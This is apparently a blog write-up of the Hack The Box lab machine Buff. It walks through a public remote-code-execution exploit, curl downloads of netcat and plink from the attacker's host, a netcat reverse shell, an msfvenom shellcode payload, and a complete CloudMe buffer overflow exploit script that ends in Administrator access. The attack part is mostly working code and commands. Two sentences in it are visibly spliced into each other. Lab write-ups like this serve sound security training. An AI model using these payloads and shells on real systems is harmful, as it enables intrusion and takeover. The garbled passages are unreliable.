Hack The Box Writeup: Buff (10.10.10.198)

The first thing that might come into your mind when seeing the machine name, is a Buffer Overflow. If that is the case, you just guessed the procedure to obtain root on this machine. Using an exploit to gain a webshell on this Windows Server is the startingpoint of running the CloudMe Buffer Overflow attack for root.

[0x1] Reconnaissance & Enumeration

Let’s see if we can find some open ports and services as a startingpoint. Port 7680 does not appear to have any function, but 8080 servers a website. Buff is a Windows machine but uses Apache to serve the website. The machine will probably use something like WAMP/XAMP.

nmap -sV -sC -p- -oA nmap_allports 10.10.10.198

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-05 07:47 EDT
Nmap scan report for buff (10.10.10.198)
Host is up (0.023s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE    VERSION
7680/tcp open  pando-pub?
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 270.15 seconds

The port 8080 is used to run the Gym Management System 1.0. The website itself does not show any interesting information.

[0x2] Initial Foothold

A quick check to see if there might be a known vulnerability I can use with Searchsploit. It finds an Unauthenticated Remote Code Execution vulnerability. Nice!

searchsploit gym
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                           |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - Unauthenticated Remote Code Execution                                                                                                                                        | php/webapps/48506.py
WordPress Plugin WPGYM - SQL Injection                                                                                                                                                                   | php/webapps/42801.txt
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

I grab the file on my machine and find out that you only need to run the script with the url of the Gym Management system as a paramter. It does require Python 2 which my new Kali install does not like. To speed things up I switch a my parrot machine which still ahs support for Python 2.

python 48506.py http://10.10.10.198:8080/

When the exploit runs it will try to launch the webshell and give you a limited shell to run commands. The exploit is successful and I have a shell as the user: Shaun.

            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
�PNG
�
buff\shaun

Since the limited shells are not the easiest way to communicate I download Netcat for Windows on the machine to launch a full shell. I have Netcat on my attacker machine and serve it via a quick Python webserver.

python -m SimpleHTTPServer 1337

I then use Curl to download the file from my local webserver to the machine.

curl http://10.10.14.64:1337/nc.exe -o nc.exe

Before running Netcat I started a listener on my local machine for the incomming connection.

netcat -lvnp 9001

With the listener running it’s time to start Netcat and get myself a full shell to Buff.

nc.exe 10.10.14.64 9001 -e cmd.exe

Mission acomplished, the reverse shell is connected without any hassle.

listening on [any] 9001 …

connect to [10.10.14.64] from (UNKNOWN) [10.10.10.198] 49689
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

[0x3] Path to User flag

The path to the User flag is not so much as a path. It’s more a simple directory change and reading the text file

 Directory of C:\Users\shaun\Desktop
14/07/2020 13:27 <DIR> .
14/07/2020 13:27 <DIR> ..
03/09/2020 16:03 34 user.txt
               1 File(s) 34 bytes
               2 Dir(s) 8,861,081,600 bytes free

The expected file, in the expected location. I got myself a User flag!

C:\Users\shaun\Desktop>type user.txt
type user.txt
e6f2c0554599c57df16e0f741afc6321

[0x4] Path to Root flag

The machine does not really contain anything special besides the Xampp installation. I enemerasted this folder a bit but did not find any usefull information. In the Home Directory of Shaun I did noticed a file in the Downloads folder called CloudMe 1.11.2.

 Directory of C:\Users\shaun\Downloads
03/09/2020 16:22 <DIR> .
03/09/2020 16:22 <DIR> ..
16/06/2020 16:26 17,830,824 CloudMe_1112.exe
03/09/2020 16:04 59,392 nc.exe
               2 File(s) 17,890,216 bytes
               2 Dir(s) 8,801,017,856 bytes free

I did a quick check using Searchsploit and found a CloudMe 1.11.2 – Buffer Overflow exploit. Since the machine is called Buff, this does makes sense.

searchsploit CloudMe
----------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC) | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR) | windows/local/48499.txt
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit) | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass) | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit) | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass) | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass) | windows_x86-64/remote/44784.py
----------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

The script has to run on the victim machine and use port 8888. The issue here is that Python is noLet;s start t installed on the machine. So running the script on will not work. Someone hinted to the use of Plink and I further checked it out. Plink can be used for forwarding commands to the machine from your own machine. It creates a connection from the machine to your attacker machine over SSH.

Time to download Plink from my machine using Curl.

curl http://10.10.14.64:1337/plink.exe -o plink.exe

Let;s start Plink an create the port forwarding.

C:\xampp\htdocs\gym\upload>plink.exe -l d0p4m1n3 -pw password 10.10.14.64 -R 8888:127.0.0.1:8888

The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's ssh-ed25519 key fingerprint is:
ssh-ed25519 255 88:c2:f9:ac:d1:3e:14:26:1e:64:45:31:56:ef:89:5e
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) y
Using username "d0p4m1n3".
Linux parrot 5.4.0-4parrot1-amd64 #1 SMP Parrot 5.4.19-4parrot1 (2020-02-27) x86_64
 ____ _ ____
| _ \ __ _ _ __ _ __ ___ | |_ / ___| ___ ___
| |_) / _` | '__| '__/ _ \| __| \___ \ / _ \/ __|
| __/ (_| | | | | | (_) | |_ ___) | __/ (__
|_| \__,_|_| |_| \___/ \__| |____/ \___|\___|

The programs included with the Parrot GNU/Linux are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Parrot GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

Using MsfVenom I generate the Python payload for our Buffer Overflow exploit script. The payload is different from the one in the standard exploit file due to the fact that I want it to launch a reverse shell.

msfvenom -p windows/exec CMD='c:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.14.64 8443' -b '\x00\x0A\x0D' -f python
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 273 (iteration=0)
x86/shikata_ga_nai chosen with final size 273
Payload size: 273 bytes
Final size of python file: 1334 bytes
buf = b""
buf += b"\xbe\x16\x92\xb5\xb5\xd9\xc3\xd9\x74\x24\xf4\x5f\x31"
buf += b"\xc9\xb1\x3e\x83\xef\xfc\x31\x77\x10\x03\x77\x10\xf4"
buf += b"\x67\x49\x5d\x7a\x87\xb2\x9e\x1a\x01\x57\xaf\x1a\x75"
buf += b"\x13\x80\xaa\xfd\x71\x2d\x41\x53\x62\xa6\x27\x7c\x85"
buf += b"\x0f\x8d\x5a\xa8\x90\xbd\x9f\xab\x12\xbf\xf3\x0b\x2a"
buf += b"\x70\x06\x4d\x6b\x6c\xeb\x1f\x24\xfb\x5e\xb0\x41\xb1"
buf += b"\x62\x3b\x19\x54\xe3\xd8\xea\x57\xc2\x4e\x60\x0e\xc4"
buf += b"\x71\xa5\x3b\x4d\x6a\xaa\x01\x07\x01\x18\xfe\x96\xc3"
buf += b"\x50\xff\x35\x2a\x5d\xf2\x44\x6a\x5a\xec\x32\x82\x98"
buf += b"\x91\x44\x51\xe2\x4d\xc0\x42\x44\x06\x72\xaf\x74\xcb"
buf += b"\xe5\x24\x7a\xa0\x62\x62\x9f\x37\xa6\x18\x9b\xbc\x49"
buf += b"\xcf\x2d\x86\x6d\xcb\x76\x5d\x0f\x4a\xd3\x30\x30\x8c"
buf += b"\xbc\xed\x94\xc6\x51\xfa\xa4\x84\x3f\xfd\x3b\xb3\x72"
buf += b"\xfd\x43\xbc\x22\x95\x72\x37\xad\xe2\x8a\x92\x89\x1c"
buf += b"\xc1\xbf\xb8\xb4\x8c\x55\xf9\xd9\x2e\x80\x3e\xe7\xac"
buf += b"\x21\xbf\x1c\xac\x43\xba\x59\x6a\xbf\xb6\xf2\x1f\xbf"
buf += b"\x65\xf3\x35\xdc\xb3\x57\xce\x42\xa9\x17\x5e\xd9\x59"
buf += b"\xa3\xfa\x8e\xfa\x38\x5f\x36\x84\xd3\x03\xcd\x06\x47"
buf += b"\xd3\x4c\x83\xcb\x45\xec\x65\x96\xe1\x97\x59\x75\x77"
buf += b"\x78\xf9\xe8\x13\x56\x98\x8a\xbe\x86\x53\x5a\x6f\xf6"
buf += b"\xa3\xb4\x5e\xcc\xed\xfe\x94\x0c\xca\xca\xe0\x7f\x2a"

With the payload replaced with the newly generated one, the total script looks like this:

# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

#Instructions:
# Start the CloudMe service and run the script.

import socket

target = "127.0.0.1"

padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload = b""
payload += b"\xbe\x16\x92\xb5\xb5\xd9\xc3\xd9\x74\x24\xf4\x5f\x31"
payload += b"\xc9\xb1\x3e\x83\xef\xfc\x31\x77\x10\x03\x77\x10\xf4"
payload += b"\x67\x49\x5d\x7a\x87\xb2\x9e\x1a\x01\x57\xaf\x1a\x75"
payload += b"\x13\x80\xaa\xfd\x71\x2d\x41\x53\x62\xa6\x27\x7c\x85"
payload += b"\x0f\x8d\x5a\xa8\x90\xbd\x9f\xab\x12\xbf\xf3\x0b\x2a"
payload += b"\x70\x06\x4d\x6b\x6c\xeb\x1f\x24\xfb\x5e\xb0\x41\xb1"
payload += b"\x62\x3b\x19\x54\xe3\xd8\xea\x57\xc2\x4e\x60\x0e\xc4"
payload += b"\x71\xa5\x3b\x4d\x6a\xaa\x01\x07\x01\x18\xfe\x96\xc3"
payload += b"\x50\xff\x35\x2a\x5d\xf2\x44\x6a\x5a\xec\x32\x82\x98"
payload += b"\x91\x44\x51\xe2\x4d\xc0\x42\x44\x06\x72\xaf\x74\xcb"
payload += b"\xe5\x24\x7a\xa0\x62\x62\x9f\x37\xa6\x18\x9b\xbc\x49"
payload += b"\xcf\x2d\x86\x6d\xcb\x76\x5d\x0f\x4a\xd3\x30\x30\x8c"
payload += b"\xbc\xed\x94\xc6\x51\xfa\xa4\x84\x3f\xfd\x3b\xb3\x72"
payload += b"\xfd\x43\xbc\x22\x95\x72\x37\xad\xe2\x8a\x92\x89\x1c"
payload += b"\xc1\xbf\xb8\xb4\x8c\x55\xf9\xd9\x2e\x80\x3e\xe7\xac"
payload += b"\x21\xbf\x1c\xac\x43\xba\x59\x6a\xbf\xb6\xf2\x1f\xbf"
payload += b"\x65\xf3\x35\xdc\xb3\x57\xce\x42\xa9\x17\x5e\xd9\x59"
payload += b"\xa3\xfa\x8e\xfa\x38\x5f\x36\x84\xd3\x03\xcd\x06\x47"
payload += b"\xd3\x4c\x83\xcb\x45\xec\x65\x96\xe1\x97\x59\x75\x77"
payload += b"\x78\xf9\xe8\x13\x56\x98\x8a\xbe\x86\x53\x5a\x6f\xf6"
payload += b"\xa3\xb4\x5e\xcc\xed\xfe\x94\x0c\xca\xca\xe0\x7f\x2a"

overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))

buf = padding1 + EIP + NOPS + payload + overrun

try:
 s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect((target,8888))
 s.send(buf)
except Exception as e:
 print(sys.exc_value)

Before running the script I need to launch another listener. The port is the one used in the generation of the payload with MsfVenom, 8443.

netcat -lvnp 8443

Let’s launch the Python script which will use the local port 8888 and forward it to the Buff machine.

python 48389.py

And it’s connected! The reverse connection was initiated from Buff to my machine, indicating that the payload did run without interuption. A quick check using whoami shows that the shell runs as Administrator.

Listening on [any] 8443 ...
connect to [10.10.14.64] from (UNKNOWN) [10.10.10.198] 49698
Microsoft Windows [VerLast but not least, sion 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
buff\administrator

C:\Windows\system32>hostname
hostname
BUFF

Last but not least, the root-flag to officiale mark this box as rooted.

C:\Windows\system32>type c:\users\administrator\desktop\root.txt
9d5ab2de5c3175ae7a72093b61f0e580




[box type=”warning” align=”” class=”” width=””]All information in this post is for educational use only! Do not use it at others when you do not have explicit approval to do so. I am not responsible for your actions. Using this knowledge for illegal activities could land you in jail![/box]

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.